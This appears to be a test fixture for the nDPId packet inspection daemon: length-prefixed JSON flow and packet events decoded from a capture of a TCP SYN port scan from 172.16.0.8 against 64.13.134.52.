+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswGgAACwGXAqsEAAIQA2GNIzTBATdU4MZAAAAAGACBAAwiAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsjQAAADUGhnKsEAAIQA2GNIzTDnfdU4MZAAAAAGACCAAiFQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsxBEAACgGXGGsEAAIQA2GNIzTAGTdU4MZAAAAAGACBAA0KAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADsGVaqsEAAIQA2GNIzTA4fdU4MZAAAAAGACEAAlBQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzkAACgGxTmsEAAIQA2GNIzTA\/\/dU4MZAAAAAGACBAAwjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kQAADYGKC6sEAAIQA2GNIzTBTbdU4MZAAAAAGACDAAnVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAszccAADoGQKusEAAIQA2GNIzTE77dU4MZAAAAAGACDAAYzgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsHwsAAC8G+mesEAAIQA2GNIzTAnzdU4MZAAAAAGACEAAmEAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs0XAAACYGUQKsEAAIQA2GNIzTBFPdU4MZAAAAAGACDAAoOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsKaQAACUG+c6sEAAIQA2GNIzSIL\/dUoMYAAAAAGACCAAP0AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwIAACoG13CsEAAIQA2GNIzSAiDdUoMYAAAAAGACDAAqbwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsl50AAC8GgdWsEAAIQA2GNIzSI5fdUoMYAAAAAGACEAAE+AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPJwAACgG49asEAAIQA2GNIzSAbzdUoMYAAAAAGACBAAy0wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsm34AACcGhfSsEAAIQA2GNIzSDIvdUoMYAAAAAGACEAAcBAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRcAACcGWFusEAAIQA2GNIzSTv3dUoMYAAAAAGACEADZkQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAAAADYG1nKsEAAIQA2GNIzSGgvdUoMYAAAAAGACDAAShAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAscNkAACkGrpmsEAAIQA2GNIzSG7\/dUoMYAAAAAGACCAAU0AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzsAACgGxTesEAAIQA2GNIzSB9rdUoMYAAAAAGACBAAstQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAseaYAADcGl8ysEAAIQA2GNIzSeOfdUoMYAAAAAGACEACvpwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAstGYAACYGbgysEAAIQA2GNIzSBEHdUoMYAAAAAGACDAAoTgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060968,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_packet_id":1,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060968,"pkt":"ACYLMQczACWzv5HuCABFAAAs5AYAADgGLGysEAAIQA2GNIzSC17dUoMYAAAAAGACBAApMQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060969,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_packet_id":1,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060969,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/oAACUGE3msEAAIQA2GNIzSFO3dUoMYAAAAAGACCAAbogAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeMAADAGBpCsEAAIQA2GNIzTAgPdU4MZAAAAAGACBAAyiQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmQAACcG4w6sEAAIQA2GNIzTCk7dU4MZAAAAAGACEAAePgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAs2NYAACkGRpysEAAIQA2GNIzTFa7dU4MZAAAAAGACCAAa3gAAAgQFtA=="} 